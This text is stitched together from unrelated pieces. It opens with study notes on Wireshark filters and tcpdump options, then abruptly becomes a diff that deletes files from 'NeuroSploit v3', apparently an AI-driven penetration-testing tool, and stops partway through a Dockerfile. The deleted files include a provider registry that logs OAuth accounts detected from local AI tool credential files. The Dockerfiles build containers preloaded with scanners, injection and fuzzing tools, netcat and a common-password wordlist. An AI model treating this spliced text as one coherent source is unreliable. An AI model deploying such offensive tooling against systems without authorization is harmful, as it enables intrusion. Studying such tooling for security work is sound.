- QA engineers use it to verify network applications
- Developers use it to debug protocol implementations
- People use it to learn network protocol internals
### Features
- _Capture_ live packet data from a network interface.
- _Open_ files containing packet data captured with tcpdump/WinDump, Wireshark, and a number of other packet capture programs.
- _Import_ packets from text files containing hex dumps of packet data.
- Display packets with _very detailed protocol information_.
- _Filter packets_ on many criteria, e.g. IPv4 address, IPv6 address, Ethernet address, port, TCP, UDP.
- _Search_ for packets on many criteria.
- Create various _statistics_.
## Making Sense of Network Dumps
## Capture and Display Filters
Some of the filters are shown below.
Filter packets whose IPv4 address equals 54.36.48.153 (using `eq` or `==`):
ip.addr eq 54.36.48.153
You can combine multiple expressions with `and` or `&&`:
ip.addr eq 54.36.48.153 and tcp.stream eq 6
Get the conversation between two specific IPs and ports:
(ip.addr eq 54.36.48.153 and ip.addr eq 200.200.200.9) and (tcp.port eq 8000 and tcp.port eq 34018)
The filter options in Wireshark, shown below, list the available filters with example expressions; filters can be combined with Boolean operators as required.
![wireshark filters](https://i.imgur.com/Hms4ccu.png)
## Following TCP Streams
A good [link](https://www.youtube.com/watch?time_continue=4&v=xPgCZwj446o) to learn in detail how to follow tcp stream:
![TCP stream Index](https://i.imgur.com/smfXY16.png)
----------
Tcpdump
-----------
Official [site](https://www.tcpdump.org/tcpdump_man.html)
other references:
https://linux.die.net/man/8/tcpdump
https://danielmiessler.com/study/tcpdump/
> Tcpdump is the premier network analysis tool for information security professionals.
When using a tool that displays network traffic in a more natural (raw) way, the burden of analysis is placed directly on the human rather than the application. This approach cultivates continued and elevated understanding of the TCP/IP suite.
### Options
- **`-i any`** : Listen on all interfaces just to see if you're seeing any traffic.
- **`-i eth0`** : Listen on the eth0 interface.
- **`-D`** : Show the list of available interfaces.
- **`-n`** : Don't resolve hostnames.
- **`-nn`** : Don't resolve hostnames _or_ port names.
- **`-q`** : Be less verbose (more quiet) with your output; show less protocol information.
- **`-t`** : Don't print a timestamp on each line.
- **`-tttt`** : Give maximally human-readable timestamp output.
- **`-X`** : Show the packet's _contents_ in both [hex](https://en.wikipedia.org/wiki/Hexidecimal) and [ascii](https://en.wikipedia.org/wiki/Ascii).
- **`-XX`** : Same as **`-X`**, but also shows the ethernet header.
- **`-v, -vv, -vvv`** : Increase the amount of packet information you get back.
- **`-c`** : Only get _x_ number of packets and then stop.
- **`-s`** : Define the _snaplength_ (size) of the capture in bytes. Use `-s0` to get everything, unless you are intentionally capturing less.
- **`-S`** : Print absolute sequence numbers.
- **`-e`** : Get the ethernet header as well.
- **`-E`** : Decrypt IPSEC traffic by providing an encryption key.
### Expressions
In `tcpdump`, _Expressions_ allow you to trim out various types of traffic and find exactly what you're looking for. Mastering the expressions and learning to combine them creatively is what makes one truly powerful with `tcpdump`.
There are three main types of expression: `type`, `dir`, and `proto`.
- Type options are: `host`, `net`, and `port`.
- Direction lets you do `src`, `dst`, and combinations thereof.
- Proto(col) lets you designate: `tcp`, `udp`, `icmp`, `ah`, and many more.
## Filtering Traffic
**Filtering hosts:**
| | |
|--|--|
| Match any traffic involving 192.168.1.1 as destination or source | `$ tcpdump -i eth1 host 192.168.1.1` |
| As source only | `$ tcpdump -i eth1 src host 192.168.1.1` |
| As destination only | `$ tcpdump -i eth1 dst host 192.168.1.1` |
**Filtering ports :**
| | |
|--|--|
| Match any traffic involving port 25 as source or destination | `$ tcpdump -i eth1 port 25` |
| As source only | `$ tcpdump -i eth1 src port 25` |
| As destination only | `$ tcpdump -i eth1 dst port 25` |
**Network filtering :**
$ tcpdump -i eth1 net 192.168
$ tcpdump -i eth1 src net 192.168
$ tcpdump -i eth1 dst net 192.168
**Protocol filtering :**
$ tcpdump -i eth1 arp
$ tcpdump -i eth1 ip
$ tcpdump -i eth1 tcp
$ tcpdump -i eth1 udp
$ tcpdump -i eth1 icmp
***Combine expressions :***
*Negation* : `!` or `not` (without the quotes)
*Concatenate* : `&&` or `and`
*Alternate* : `||` or `or`
- This rule will match any TCP traffic on port `80` (web) with `192.168.1.254` or `192.168.1.200` as destination host
`$ tcpdump -i eth1 '((tcp) and (port 80) and ((dst host 192.168.1.254) or (dst host 192.168.1.200)))'`
- Will match any ICMP traffic involving the destination with physical/MAC address `00:01:02:03:04:05`
`$ tcpdump -i eth1 '((icmp) and ((ether dst host 00:01:02:03:04:05)))'`
- Will match any TCP traffic for the destination network `192.168` except destination host `192.168.1.200`
`$ tcpdump -i eth1 '((tcp) and ((dst net 192.168) and (not dst host 192.168.1.200)))'`
## Advanced Header Filtering
> Helpful [link](https://www.wains.be/pub/networking/tcpdump_advanced_filters.txt)
| | |
|--|--|
| `proto[x:y]` | selects `y` bytes starting at byte offset `x`. `ip[2:2]` selects the third and fourth bytes of the IP header (offsets are zero-based) |
| `proto[x:y] & z = 0` | matches when *all* bits selected by `mask z` are `0` in `proto[x:y]` |
| `proto[x:y] & z !=0` | matches when *at least one* bit selected by `mask z` is *set* in `proto[x:y]` |
| `proto[x:y] & z = z` | matches when *every* bit selected by `mask z` is *set* in `proto[x:y]` |
| `proto[x:y] = z` | matches when `proto[x:y]` is exactly equal to `z` |
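
The byte-offset and mask rules in the table can be checked by hand on a sample header. The sketch below is an illustration only: the helper `field` and the hand-built 20-byte IPv4 header are assumptions made for this example, and the code mimics how the expressions are evaluated rather than calling tcpdump itself.

```python
import struct


def field(packet: bytes, offset: int, length: int = 1) -> int:
    """Value of proto[offset:length], read as a big-endian unsigned integer."""
    return int.from_bytes(packet[offset:offset + length], "big")


# Sample IPv4 header: version/IHL, TOS, total length, ID, flags+fragment offset,
# TTL, protocol, checksum (left at 0 here), source address, destination address.
header = struct.pack(
    "!BBHHHBBH4s4s",
    0x45, 0, 40, 0x1234, 0x4000, 64, 6, 0,
    bytes([192, 168, 1, 1]), bytes([192, 168, 1, 200]),
)

total_length = field(header, 2, 2)            # ip[2:2]
dont_fragment = (field(header, 6) & 0x40) != 0  # ip[6] & 0x40 != 0
more_fragments = (field(header, 6) & 0x20) != 0  # ip[6] & 0x20 != 0
is_tcp = field(header, 9) == 6                # ip[9] = 6
```

For this header `ip[2:2]` evaluates to 40 (the total length), the Don't Fragment bit is set, the More Fragments bit is clear, and the protocol byte equals 6 (TCP).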
**IP header**
![IP header](https://i.imgur.com/rD6BF52.jpg)
-269
View File
@@ -1,269 +0,0 @@
{
"claude_code": {
"id": "claude_code",
"name": "Claude Code",
"auth_type": "oauth",
"api_format": "anthropic",
"base_url": "https://api.anthropic.com",
"tier": 1,
"default_model": "claude-sonnet-4-5-20250929",
"accounts": {
"acct_36f54de8": {
"id": "acct_36f54de8",
"label": "Claude Code (credentials file)",
"source": "cli_detect",
"credential_type": "oauth",
"created_at": "2026-02-16T18:46:19Z",
"last_used": null,
"tokens_used": 0,
"is_active": true,
"expires_at": 1771822745.308,
"model_override": null
}
},
"env_key": null,
"enabled": true
},
"codex_cli": {
"id": "codex_cli",
"name": "OpenAI Codex CLI",
"auth_type": "oauth",
"api_format": "openai_compat",
"base_url": "https://api.openai.com/v1",
"tier": 1,
"default_model": "gpt-4o",
"accounts": {},
"env_key": null,
"enabled": true
},
"gemini_cli": {
"id": "gemini_cli",
"name": "Gemini CLI",
"auth_type": "oauth",
"api_format": "gemini_code_assist",
"base_url": "https://cloudcode-pa.googleapis.com",
"tier": 1,
"default_model": "gemini-2.5-flash",
"accounts": {
"acct_ad76c781": {
"id": "acct_ad76c781",
"label": "Gemini CLI",
"source": "cli_detect",
"credential_type": "oauth",
"created_at": "2026-02-16T18:45:22Z",
"last_used": "2026-02-18T14:59:29Z",
"tokens_used": 5009,
"is_active": true,
"expires_at": 1771461656.003,
"model_override": null
}
},
"env_key": null,
"enabled": true
},
"cursor": {
"id": "cursor",
"name": "Cursor",
"auth_type": "oauth",
"api_format": "openai_compat",
"base_url": "https://api2.cursor.sh/v1",
"tier": 1,
"default_model": "cursor-fast",
"accounts": {},
"env_key": null,
"enabled": true
},
"copilot": {
"id": "copilot",
"name": "GitHub Copilot",
"auth_type": "oauth",
"api_format": "openai_compat",
"base_url": "https://api.githubcopilot.com",
"tier": 1,
"default_model": "gpt-4o",
"accounts": {},
"env_key": null,
"enabled": true
},
"iflow": {
"id": "iflow",
"name": "iFlow AI",
"auth_type": "oauth",
"api_format": "openai_compat",
"base_url": "https://api.iflow.ai/v1",
"tier": 1,
"default_model": "kimi-k2",
"accounts": {},
"env_key": null,
"enabled": true
},
"qwen_code": {
"id": "qwen_code",
"name": "Qwen Code",
"auth_type": "oauth",
"api_format": "openai_compat",
"base_url": "https://chat.qwen.ai/api/v1",
"tier": 1,
"default_model": "qwen3-coder",
"accounts": {},
"env_key": null,
"enabled": true
},
"kiro": {
"id": "kiro",
"name": "Kiro AI",
"auth_type": "oauth",
"api_format": "anthropic",
"base_url": "https://api.anthropic.com",
"tier": 1,
"default_model": "claude-sonnet-4-5-20250929",
"accounts": {},
"env_key": null,
"enabled": true
},
"anthropic": {
"id": "anthropic",
"name": "Anthropic",
"auth_type": "api_key",
"api_format": "anthropic",
"base_url": "https://api.anthropic.com",
"tier": 1,
"default_model": "claude-sonnet-4-5-20250929",
"accounts": {
"acct_eaabc038": {
"id": "acct_eaabc038",
"label": "Anthropic (env)",
"source": "env_var",
"credential_type": "api_key",
"created_at": "2026-02-16T13:46:47Z",
"last_used": "2026-02-16T19:05:03Z",
"tokens_used": 114420,
"is_active": true,
"expires_at": null,
"model_override": null
}
},
"env_key": "ANTHROPIC_API_KEY",
"enabled": true
},
"openai": {
"id": "openai",
"name": "OpenAI",
"auth_type": "api_key",
"api_format": "openai_compat",
"base_url": "https://api.openai.com/v1",
"tier": 1,
"default_model": "gpt-4o",
"accounts": {},
"env_key": "OPENAI_API_KEY",
"enabled": true
},
"gemini": {
"id": "gemini",
"name": "Gemini",
"auth_type": "api_key",
"api_format": "gemini",
"base_url": "https://generativelanguage.googleapis.com/v1beta",
"tier": 1,
"default_model": "gemini-2.5-flash",
"accounts": {},
"env_key": "GEMINI_API_KEY",
"enabled": true
},
"openrouter": {
"id": "openrouter",
"name": "OpenRouter",
"auth_type": "api_key",
"api_format": "openai_compat",
"base_url": "https://openrouter.ai/api/v1",
"tier": 1,
"default_model": "anthropic/claude-sonnet-4-5",
"accounts": {},
"env_key": "OPENROUTER_API_KEY",
"enabled": true
},
"glm": {
"id": "glm",
"name": "GLM (Zhipu AI)",
"auth_type": "api_key",
"api_format": "openai_compat",
"base_url": "https://open.bigmodel.cn/api/paas/v4",
"tier": 2,
"default_model": "glm-4-flash",
"accounts": {},
"env_key": "GLM_API_KEY",
"enabled": true
},
"kimi": {
"id": "kimi",
"name": "Kimi (Moonshot)",
"auth_type": "api_key",
"api_format": "openai_compat",
"base_url": "https://api.moonshot.cn/v1",
"tier": 2,
"default_model": "moonshot-v1-8k",
"accounts": {},
"env_key": "KIMI_API_KEY",
"enabled": true
},
"minimax": {
"id": "minimax",
"name": "Minimax",
"auth_type": "api_key",
"api_format": "openai_compat",
"base_url": "https://api.minimax.chat/v1",
"tier": 2,
"default_model": "abab6.5-chat",
"accounts": {},
"env_key": "MINIMAX_API_KEY",
"enabled": true
},
"together": {
"id": "together",
"name": "Together AI",
"auth_type": "api_key",
"api_format": "openai_compat",
"base_url": "https://api.together.xyz/v1",
"tier": 2,
"default_model": "meta-llama/Llama-3-70b-chat-hf",
"accounts": {},
"env_key": "TOGETHER_API_KEY",
"enabled": true
},
"fireworks": {
"id": "fireworks",
"name": "Fireworks AI",
"auth_type": "api_key",
"api_format": "openai_compat",
"base_url": "https://api.fireworks.ai/inference/v1",
"tier": 2,
"default_model": "accounts/fireworks/models/llama-v3p1-70b-instruct",
"accounts": {},
"env_key": "FIREWORKS_API_KEY",
"enabled": true
},
"ollama": {
"id": "ollama",
"name": "Ollama",
"auth_type": "api_key",
"api_format": "ollama",
"base_url": "http://localhost:11434",
"tier": 3,
"default_model": "llama3",
"accounts": {},
"env_key": "OLLAMA_API_KEY",
"enabled": true
},
"lmstudio": {
"id": "lmstudio",
"name": "LM Studio",
"auth_type": "api_key",
"api_format": "openai_compat",
"base_url": "http://localhost:1234/v1",
"tier": 3,
"default_model": "local-model",
"accounts": {},
"env_key": "LMSTUDIO_API_KEY",
"enabled": true
}
}
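
How the removed Python engine consumed this registry is not shown in the diff. As a hedged illustration only, the sketch below picks a provider from a registry with the same field names. The function `pick_provider` is hypothetical, and it assumes that a lower `tier` means higher preference and that a provider is usable when it is enabled and has either an active account or a populated `env_key` variable.

```python
import os


def pick_provider(registry, environ=None):
    """Return the id of the most-preferred usable provider, or None.

    Assumption: a lower "tier" number means higher preference.
    """
    environ = os.environ if environ is None else environ

    def usable(provider):
        if not provider.get("enabled"):
            return False
        accounts = provider.get("accounts", {}).values()
        has_account = any(a.get("is_active") for a in accounts)
        env_key = provider.get("env_key")
        has_env_key = bool(env_key and environ.get(env_key))
        return has_account or has_env_key

    candidates = [p for p in registry.values() if usable(p)]
    # sorted() is stable, so providers in the same tier keep their file order.
    candidates = sorted(candidates, key=lambda p: p["tier"])
    return candidates[0]["id"] if candidates else None


# Trimmed-down registry using the same field names as the file above.
registry = {
    "openai": {"id": "openai", "tier": 1, "enabled": True,
               "accounts": {}, "env_key": "OPENAI_API_KEY"},
    "glm": {"id": "glm", "tier": 2, "enabled": True,
            "accounts": {}, "env_key": "GLM_API_KEY"},
    "ollama": {"id": "ollama", "tier": 3, "enabled": True,
               "accounts": {}, "env_key": "OLLAMA_API_KEY"},
}

print(pick_provider(registry, environ={"GLM_API_KEY": "x", "OLLAMA_API_KEY": "y"}))
```

Passing `environ` explicitly keeps the selection testable without touching the real process environment.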
-88
View File
File diff suppressed because one or more lines are too long
-45
View File
@@ -1,45 +0,0 @@
# NeuroSploit v3 - LITE Docker Compose
# Fast builds without external security tools
# Usage: docker compose -f docker-compose.lite.yml up --build
services:
  backend:
    build:
      context: .
      dockerfile: docker/Dockerfile.backend.lite
    container_name: neurosploit-backend
    env_file:
      - .env
    environment:
      - ANTHROPIC_API_KEY=${ANTHROPIC_API_KEY:-}
      - OPENAI_API_KEY=${OPENAI_API_KEY:-}
      - DATABASE_URL=sqlite+aiosqlite:///./data/neurosploit.db
    volumes:
      - neurosploit-data:/app/data
    ports:
      - "8000:8000"
    restart: unless-stopped
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:8000/api/health"]
      interval: 30s
      timeout: 10s
      retries: 3
  frontend:
    build:
      context: .
      dockerfile: docker/Dockerfile.frontend
    container_name: neurosploit-frontend
    ports:
      - "3000:80"
    depends_on:
      backend:
        condition: service_healthy
    restart: unless-stopped
volumes:
  neurosploit-data:
networks:
  default:
    name: neurosploit-network
-45
View File
@@ -1,45 +0,0 @@
services:
  backend:
    build:
      context: .
      # Use Dockerfile.backend.lite for faster builds (no security tools)
      # Use Dockerfile.backend for full version with all tools
      dockerfile: docker/Dockerfile.backend
    container_name: neurosploit-backend
    env_file:
      - .env
    environment:
      # These override .env if set
      - ANTHROPIC_API_KEY=${ANTHROPIC_API_KEY:-}
      - OPENAI_API_KEY=${OPENAI_API_KEY:-}
      - NIM_API_KEY=${NIM_API_KEY:-}
      - DATABASE_URL=sqlite+aiosqlite:///./data/neurosploit.db
    volumes:
      - neurosploit-data:/app/data
    ports:
      - "8000:8000"
    restart: unless-stopped
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:8000/api/health"]
      interval: 30s
      timeout: 10s
      retries: 3
  frontend:
    build:
      context: .
      dockerfile: docker/Dockerfile.frontend
    container_name: neurosploit-frontend
    ports:
      - "3000:80"
    depends_on:
      backend:
        condition: service_healthy
    restart: unless-stopped
volumes:
  neurosploit-data:
networks:
  default:
    name: neurosploit-network
-103
View File
@@ -1,103 +0,0 @@
# NeuroSploit v3 - Optimized Multi-Stage Dockerfile
# Dramatically reduces build time and image size
# Supports ARM64 (Apple Silicon) and AMD64
# =============================================================================
# STAGE 1: Go Tools Builder
# =============================================================================
FROM golang:1.22-alpine AS go-builder
RUN apk add --no-cache git
WORKDIR /build
# Install Go tools in parallel; a bare `wait` returns 0, so a failed install does not fail the build
RUN go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest & \
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest & \
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest & \
go install -v github.com/tomnomnom/waybackurls@latest & \
go install -v github.com/ffuf/ffuf/v2@latest & \
wait
RUN go install -v github.com/projectdiscovery/katana/cmd/katana@latest & \
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest & \
go install -v github.com/lc/gau/v2/cmd/gau@latest & \
go install -v github.com/tomnomnom/gf@latest & \
go install -v github.com/tomnomnom/qsreplace@latest & \
wait
RUN go install -v github.com/hahwul/dalfox/v2@latest & \
go install -v github.com/OJ/gobuster/v3@latest & \
go install -v github.com/jaeles-project/gospider@latest & \
go install -v github.com/tomnomnom/anew@latest & \
wait
# Optional tools (less critical)
RUN go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest 2>/dev/null || true
RUN go install -v github.com/hakluke/hakrawler@latest 2>/dev/null || true
# =============================================================================
# STAGE 2: Python Dependencies
# =============================================================================
FROM python:3.11-slim AS python-deps
WORKDIR /app
COPY backend/requirements.txt .
RUN pip install --no-cache-dir --user -r requirements.txt && \
pip install --no-cache-dir --user arjun wafw00f
# =============================================================================
# STAGE 3: Final Runtime Image
# =============================================================================
FROM python:3.11-slim AS runtime
# Install only essential runtime dependencies
RUN apt-get update && apt-get install -y --no-install-recommends \
curl \
wget \
git \
dnsutils \
nmap \
sqlmap \
jq \
ca-certificates \
libpcap0.8 \
&& rm -rf /var/lib/apt/lists/* \
&& apt-get clean
WORKDIR /app
# Copy Go binaries from builder (may be partial if some tools failed)
COPY --from=go-builder /go/bin/ /usr/local/bin/
# Note: Rust tools (feroxbuster) removed for faster builds
# Install via: cargo install feroxbuster (if needed)
# Copy Python packages
COPY --from=python-deps /root/.local /root/.local
ENV PATH=/root/.local/bin:$PATH
# Copy application code
COPY backend/ ./backend/
COPY prompts/ ./prompts/
# Create data directories
RUN mkdir -p data/reports data/scans data/recon /root/.config/nuclei
# Download wordlists (small subset for faster builds)
RUN mkdir -p /opt/wordlists && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt -O /opt/wordlists/common.txt || true && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-5000.txt -O /opt/wordlists/subdomains-5000.txt || true
# Update nuclei templates at build time (best effort; a failed update does not fail the build)
RUN nuclei -update-templates -silent 2>/dev/null || true
# Health check
HEALTHCHECK --interval=30s --timeout=10s --start-period=5s --retries=3 \
CMD curl -f http://localhost:8000/api/health || exit 1
EXPOSE 8000
CMD ["python", "-m", "uvicorn", "backend.main:app", "--host", "0.0.0.0", "--port", "8000"]
-32
View File
@@ -1,32 +0,0 @@
# NeuroSploit v3 - LITE Dockerfile (Fast Build)
# Minimal image without external security tools
# Use this for development or when you don't need the recon tools
FROM python:3.11-slim
# Install minimal dependencies
RUN apt-get update && apt-get install -y --no-install-recommends \
curl \
ca-certificates \
&& rm -rf /var/lib/apt/lists/*
WORKDIR /app
# Install Python dependencies
COPY backend/requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
# Copy application code
COPY backend/ ./backend/
COPY prompts/ ./prompts/
# Create data directories
RUN mkdir -p data/reports data/scans data/recon
# Health check
HEALTHCHECK --interval=30s --timeout=10s --start-period=5s --retries=3 \
CMD curl -f http://localhost:8000/api/health || exit 1
EXPOSE 8000
CMD ["python", "-m", "uvicorn", "backend.main:app", "--host", "0.0.0.0", "--port", "8000"]
-29
View File
@@ -1,29 +0,0 @@
# Build stage
FROM node:20-alpine AS builder
WORKDIR /app
# Copy package files
COPY frontend/package*.json ./
# Install dependencies
RUN npm install
# Copy source code
COPY frontend/ ./
# Build the application
RUN npm run build
# Production stage
FROM nginx:alpine
# Copy built assets
COPY --from=builder /app/dist /usr/share/nginx/html
# Copy nginx configuration
COPY docker/nginx.conf /etc/nginx/conf.d/default.conf
EXPOSE 80
CMD ["nginx", "-g", "daemon off;"]
-131
View File
@@ -1,131 +0,0 @@
# NeuroSploit v3 - Kali Linux Security Sandbox
# Per-scan container with essential tools pre-installed + on-demand install support.
#
# Build:
# docker build -f docker/Dockerfile.kali -t neurosploit-kali:latest docker/
#
# Rebuild (no cache):
# docker build --no-cache -f docker/Dockerfile.kali -t neurosploit-kali:latest docker/
#
# Or via compose:
# docker compose -f docker/docker-compose.kali.yml build
#
# Design:
# - Pre-compile Go tools (nuclei, naabu, httpx, subfinder, katana, dnsx, ffuf,
# gobuster, dalfox, waybackurls, uncover) to avoid 60s+ go install per scan
# - Pre-install common apt tools (nikto, sqlmap, masscan, whatweb) for instant use
# - Include Go, Python, pip, git so on-demand tools can be compiled/installed
# - Full Kali apt repos available for on-demand apt-get install of any security tool
# ---- Stage 1: Pre-compile Go security tools ----
FROM golang:1.26-bookworm AS go-builder
RUN apt-get update && apt-get install -y --no-install-recommends \
git build-essential libpcap-dev \
&& rm -rf /var/lib/apt/lists/*
WORKDIR /build
# Pre-compile ProjectDiscovery suite + common Go tools
# Split into separate RUN layers for better Docker cache (if one fails, others cached)
RUN go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
RUN go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
RUN go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
RUN go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
RUN go install -v github.com/projectdiscovery/katana/cmd/katana@latest
RUN go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest
RUN go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest
RUN go install -v github.com/ffuf/ffuf/v2@latest
RUN go install -v github.com/OJ/gobuster/v3@v3.7.0
RUN go install -v github.com/hahwul/dalfox/v2@latest
RUN go install -v github.com/tomnomnom/waybackurls@latest
# ---- Stage 2: Kali Linux runtime ----
FROM kalilinux/kali-rolling
LABEL maintainer="NeuroSploit Team"
LABEL description="NeuroSploit Kali Sandbox - Per-scan isolated tool execution"
LABEL neurosploit.version="3.0"
LABEL neurosploit.type="kali-sandbox"
ENV DEBIAN_FRONTEND=noninteractive
# Layer 1: Core system + build tools (rarely changes, cached)
RUN apt-get update && apt-get install -y --no-install-recommends \
bash \
curl \
wget \
git \
jq \
ca-certificates \
openssl \
dnsutils \
whois \
netcat-openbsd \
libpcap-dev \
python3 \
python3-pip \
golang-go \
build-essential \
&& rm -rf /var/lib/apt/lists/*
# Layer 2: Pre-install common security tools from Kali repos (saves ~30s on-demand each)
RUN apt-get update && apt-get install -y --no-install-recommends \
nmap \
nikto \
sqlmap \
masscan \
whatweb \
&& rm -rf /var/lib/apt/lists/*
# Layer 3: VPN + network tools (for terminal agent VPN connections)
RUN apt-get update && apt-get install -y --no-install-recommends \
openvpn \
wireguard-tools \
iproute2 \
iptables \
&& rm -rf /var/lib/apt/lists/*
# Copy ALL pre-compiled Go binaries from builder
COPY --from=go-builder /go/bin/nuclei /usr/local/bin/
COPY --from=go-builder /go/bin/naabu /usr/local/bin/
COPY --from=go-builder /go/bin/httpx /usr/local/bin/
COPY --from=go-builder /go/bin/subfinder /usr/local/bin/
COPY --from=go-builder /go/bin/katana /usr/local/bin/
COPY --from=go-builder /go/bin/dnsx /usr/local/bin/
COPY --from=go-builder /go/bin/uncover /usr/local/bin/
COPY --from=go-builder /go/bin/ffuf /usr/local/bin/
COPY --from=go-builder /go/bin/gobuster /usr/local/bin/
COPY --from=go-builder /go/bin/dalfox /usr/local/bin/
COPY --from=go-builder /go/bin/waybackurls /usr/local/bin/
# Go environment for on-demand tool compilation
ENV GOPATH=/root/go
ENV PATH="${PATH}:/root/go/bin"
# Create directories
RUN mkdir -p /opt/wordlists /opt/output /opt/templates /opt/nuclei-templates
# Download commonly used wordlists (|| true so build doesn't fail on network issues)
RUN wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt \
-O /opt/wordlists/common.txt 2>/dev/null || true && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/directory-list-2.3-medium.txt \
-O /opt/wordlists/directory-list-medium.txt 2>/dev/null || true && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-5000.txt \
-O /opt/wordlists/subdomains-5000.txt 2>/dev/null || true && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-1000.txt \
-O /opt/wordlists/passwords-top1000.txt 2>/dev/null || true
# Update Nuclei templates
RUN nuclei -update-templates -silent 2>/dev/null || true
# Health check script
RUN printf '#!/bin/bash\nnuclei -version > /dev/null 2>&1 && naabu -version > /dev/null 2>&1 && echo "OK"\n' \
> /opt/healthcheck.sh && chmod +x /opt/healthcheck.sh
HEALTHCHECK --interval=60s --timeout=10s --retries=3 \
CMD /opt/healthcheck.sh
WORKDIR /opt/output
CMD ["bash"]
-98
View File
@@ -1,98 +0,0 @@
# NeuroSploit v3 - Security Sandbox Container
# Debian-based container with real penetration testing tools
# Provides Nuclei, Naabu, and other ProjectDiscovery tools via isolated execution
FROM golang:1.26-bookworm AS go-builder
RUN apt-get update && apt-get install -y --no-install-recommends git build-essential && \
rm -rf /var/lib/apt/lists/*
WORKDIR /build
# Install ProjectDiscovery suite + other Go security tools
RUN go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest && \
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest && \
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest && \
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest && \
go install -v github.com/projectdiscovery/katana/cmd/katana@latest && \
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest && \
go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest && \
go install -v github.com/ffuf/ffuf/v2@latest && \
go install -v github.com/OJ/gobuster/v3@v3.7.0 && \
go install -v github.com/hahwul/dalfox/v2@latest && \
go install -v github.com/tomnomnom/waybackurls@latest
# Final runtime image - Debian-based for compatibility
FROM debian:bookworm-slim
LABEL maintainer="NeuroSploit Team"
LABEL description="NeuroSploit Security Sandbox - Isolated tool execution environment"
# Install runtime dependencies
RUN apt-get update && apt-get install -y --no-install-recommends \
bash \
curl \
wget \
nmap \
python3 \
python3-pip \
git \
jq \
dnsutils \
openssl \
libpcap-dev \
ca-certificates \
whois \
netcat-openbsd \
nikto \
masscan \
&& rm -rf /var/lib/apt/lists/*
# Install Python security tools
RUN pip3 install --no-cache-dir --break-system-packages \
sqlmap \
wfuzz \
dirsearch \
arjun \
wafw00f \
2>/dev/null || pip3 install --no-cache-dir --break-system-packages sqlmap
# Copy Go binaries from builder
COPY --from=go-builder /go/bin/nuclei /usr/local/bin/
COPY --from=go-builder /go/bin/naabu /usr/local/bin/
COPY --from=go-builder /go/bin/httpx /usr/local/bin/
COPY --from=go-builder /go/bin/subfinder /usr/local/bin/
COPY --from=go-builder /go/bin/katana /usr/local/bin/
COPY --from=go-builder /go/bin/dnsx /usr/local/bin/
COPY --from=go-builder /go/bin/uncover /usr/local/bin/
COPY --from=go-builder /go/bin/ffuf /usr/local/bin/
COPY --from=go-builder /go/bin/gobuster /usr/local/bin/
COPY --from=go-builder /go/bin/dalfox /usr/local/bin/
COPY --from=go-builder /go/bin/waybackurls /usr/local/bin/
# Create directories
RUN mkdir -p /opt/wordlists /opt/output /opt/templates /opt/nuclei-templates
# Download wordlists
RUN wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt \
-O /opt/wordlists/common.txt && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/directory-list-2.3-medium.txt \
-O /opt/wordlists/directory-list-medium.txt && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-5000.txt \
-O /opt/wordlists/subdomains-5000.txt && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-1000.txt \
-O /opt/wordlists/passwords-top1000.txt
# Update Nuclei templates (8000+ vulnerability checks)
RUN nuclei -update-templates -silent 2>/dev/null || true
# Health check script
# printf interprets \n in every POSIX shell; echo does so only in some (e.g. dash)
RUN printf '#!/bin/bash\nnuclei -version > /dev/null 2>&1 && naabu -version > /dev/null 2>&1 && echo "OK"\n' > /opt/healthcheck.sh && \
chmod +x /opt/healthcheck.sh
HEALTHCHECK --interval=30s --timeout=10s --retries=3 \
CMD /opt/healthcheck.sh
WORKDIR /opt/output
ENTRYPOINT ["/bin/bash", "-c"]
-92
View File
@@ -1,92 +0,0 @@
# NeuroSploit v3 - Security Tools Runner Container
# Ephemeral container for running security tools in isolation
FROM golang:1.22-alpine AS go-builder
RUN apk add --no-cache git build-base
WORKDIR /build
# Install essential Go security tools
RUN go install -v github.com/ffuf/ffuf/v2@latest && \
go install -v github.com/OJ/gobuster/v3@latest && \
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest && \
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest && \
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest && \
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest && \
go install -v github.com/projectdiscovery/katana/cmd/katana@latest && \
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest && \
go install -v github.com/hahwul/dalfox/v2@latest && \
go install -v github.com/tomnomnom/waybackurls@latest
# Rust tools builder
FROM rust:1.75-alpine AS rust-builder
RUN apk add --no-cache musl-dev openssl-dev openssl-libs-static pkgconf
# Install feroxbuster
